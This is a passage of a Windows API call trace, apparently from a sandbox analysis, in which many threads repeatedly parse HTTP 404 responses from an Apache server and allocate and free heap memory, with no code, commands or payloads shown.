0x6a0000 [0240.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0240.826] GetProcessHeap () returned 0x6a0000 [0240.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 350 os_tid = 0x14dc [0241.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.069] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.069] GetProcessHeap () returned 0x6a0000 [0241.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be970 [0241.069] GetProcessHeap () returned 0x6a0000 [0241.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be970 | out: hHeap=0x6a0000) returned 1 [0241.069] GetProcessHeap () returned 0x6a0000 [0241.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 351 os_tid = 0x14e0 [0241.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.290] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.290] GetProcessHeap () returned 0x6a0000 [0241.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be970 [0241.290] GetProcessHeap () returned 0x6a0000 [0241.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be970 | out: hHeap=0x6a0000) returned 1 [0241.290] GetProcessHeap () returned 0x6a0000 [0241.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 352 os_tid = 0x14e4 [0241.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.470] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.470] GetProcessHeap () returned 0x6a0000 [0241.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0241.470] GetProcessHeap () returned 0x6a0000 [0241.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0241.470] GetProcessHeap () returned 0x6a0000 [0241.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 353 os_tid = 0x14e8 [0241.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.673] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.673] GetProcessHeap () returned 0x6a0000 [0241.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0241.674] GetProcessHeap () returned 0x6a0000 [0241.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0241.674] GetProcessHeap () returned 0x6a0000 [0241.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 354 os_tid = 0x14ec [0241.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.991] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.991] GetProcessHeap () returned 0x6a0000 [0241.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0241.991] GetProcessHeap () returned 0x6a0000 [0241.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0241.991] GetProcessHeap () returned 0x6a0000 [0241.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 Thread: id = 355 os_tid = 0x14f0 [0242.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.241] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.241] GetProcessHeap () returned 0x6a0000 [0242.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0242.241] GetProcessHeap () returned 0x6a0000 [0242.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0242.241] GetProcessHeap () returned 0x6a0000 [0242.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 Thread: id = 356 os_tid = 0x14f4 [0242.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.445] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.445] GetProcessHeap () returned 0x6a0000 [0242.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0242.445] GetProcessHeap () returned 0x6a0000 [0242.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0242.445] GetProcessHeap () returned 0x6a0000 [0242.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 Thread: id = 357 os_tid = 0x14f8 [0242.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.640] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.640] GetProcessHeap () returned 0x6a0000 [0242.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0242.640] GetProcessHeap () returned 0x6a0000 [0242.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0242.640] GetProcessHeap () returned 0x6a0000 [0242.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 Thread: id = 358 os_tid = 0x14fc [0242.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.847] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.847] GetProcessHeap () returned 0x6a0000 [0242.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0242.887] GetProcessHeap () returned 0x6a0000 [0242.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0242.887] GetProcessHeap () returned 0x6a0000 [0242.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 Thread: id = 359 os_tid = 0x1500 [0243.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.088] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.088] GetProcessHeap () returned 0x6a0000 [0243.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0243.088] GetProcessHeap () returned 0x6a0000 [0243.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0243.088] GetProcessHeap () returned 0x6a0000 [0243.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 360 os_tid = 0x1504 [0243.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.300] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.300] GetProcessHeap () returned 0x6a0000 [0243.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0243.300] GetProcessHeap () returned 0x6a0000 [0243.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0243.300] GetProcessHeap () returned 0x6a0000 [0243.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 361 os_tid = 0x1508 [0243.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.502] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.502] GetProcessHeap () returned 0x6a0000 [0243.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0243.502] GetProcessHeap () returned 0x6a0000 [0243.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0243.503] GetProcessHeap () returned 0x6a0000 [0243.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 362 os_tid = 0x150c [0243.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.817] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.817] GetProcessHeap () returned 0x6a0000 [0243.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0243.817] GetProcessHeap () returned 0x6a0000 [0243.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0243.817] GetProcessHeap () returned 0x6a0000 [0243.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 363 os_tid = 0x1510 [0244.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.208] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.208] GetProcessHeap () returned 0x6a0000 [0244.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0244.208] GetProcessHeap () returned 0x6a0000 [0244.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0244.208] GetProcessHeap () returned 0x6a0000 [0244.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 364 os_tid = 0x1514 [0244.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.556] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.556] GetProcessHeap () returned 0x6a0000 [0244.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0244.556] GetProcessHeap () returned 0x6a0000 [0244.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0244.556] GetProcessHeap () returned 0x6a0000 [0244.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 365 os_tid = 0x1518 [0244.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.922] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.923] GetProcessHeap () returned 0x6a0000 [0244.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0244.923] GetProcessHeap () returned 0x6a0000 [0244.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0244.923] GetProcessHeap () returned 0x6a0000 [0244.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 366 os_tid = 0x151c [0245.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.157] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.157] GetProcessHeap () returned 0x6a0000 [0245.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0245.157] GetProcessHeap () returned 0x6a0000 [0245.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0245.157] GetProcessHeap () returned 0x6a0000 [0245.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 367 os_tid = 0x1520 [0245.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.701] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.701] GetProcessHeap () returned 0x6a0000 [0245.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0245.702] GetProcessHeap () returned 0x6a0000 [0245.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0245.702] GetProcessHeap () returned 0x6a0000 [0245.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 368 os_tid = 0x1524 [0245.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.986] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.987] GetProcessHeap () returned 0x6a0000 [0245.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0245.987] GetProcessHeap () returned 0x6a0000 [0245.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0245.987] GetProcessHeap () returned 0x6a0000 [0245.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 369 os_tid = 0x1528 [0246.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.182] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.182] GetProcessHeap () returned 0x6a0000 [0246.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0246.182] GetProcessHeap () returned 0x6a0000 [0246.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0246.182] GetProcessHeap () returned 0x6a0000 [0246.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 370 os_tid = 0x152c [0246.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.371] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.371] GetProcessHeap () returned 0x6a0000 [0246.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0246.371] GetProcessHeap () returned 0x6a0000 [0246.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0246.373] GetProcessHeap () returned 0x6a0000 [0246.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 371 os_tid = 0x1530 [0246.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.577] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.577] GetProcessHeap () returned 0x6a0000 [0246.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0246.577] GetProcessHeap () returned 0x6a0000 [0246.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0246.577] GetProcessHeap () returned 0x6a0000 [0246.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 372 os_tid = 0x1534 [0246.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.773] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.773] GetProcessHeap () returned 0x6a0000 [0246.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0246.773] GetProcessHeap () returned 0x6a0000 [0246.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0246.773] GetProcessHeap () returned 0x6a0000 [0246.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 373 os_tid = 0x1538 [0247.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.272] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.272] GetProcessHeap () returned 0x6a0000 [0247.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0247.272] GetProcessHeap () returned 0x6a0000 [0247.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0247.272] GetProcessHeap () returned 0x6a0000 [0247.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 374 os_tid = 0x153c [0247.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.490] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.490] GetProcessHeap () returned 0x6a0000 [0247.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0247.491] GetProcessHeap () returned 0x6a0000 [0247.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0247.491] GetProcessHeap () returned 0x6a0000 [0247.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 375 os_tid = 0x1540 [0247.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.716] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.720] GetProcessHeap () returned 0x6a0000 [0247.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be790 [0247.720] GetProcessHeap () returned 0x6a0000 [0247.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be790 | out: hHeap=0x6a0000) returned 1 [0247.720] GetProcessHeap () returned 0x6a0000 [0247.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 376 os_tid = 0x1544 [0247.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.948] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.948] GetProcessHeap () returned 0x6a0000 [0247.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0247.948] GetProcessHeap () returned 0x6a0000 [0247.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0247.948] GetProcessHeap () returned 0x6a0000 [0247.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 377 os_tid = 0x1548 [0248.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.486] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.486] GetProcessHeap () returned 0x6a0000 [0248.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0248.486] GetProcessHeap () returned 0x6a0000 [0248.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0248.486] GetProcessHeap () returned 0x6a0000 [0248.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 378 os_tid = 0x154c [0248.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0248.820] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.820] GetProcessHeap () returned 0x6a0000 [0248.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0248.820] GetProcessHeap () returned 0x6a0000 [0248.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0248.820] GetProcessHeap () returned 0x6a0000 [0248.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 379 os_tid = 0x1550 [0249.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.212] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.212] GetProcessHeap () returned 0x6a0000 [0249.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0249.212] GetProcessHeap () returned 0x6a0000 [0249.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0249.212] GetProcessHeap () 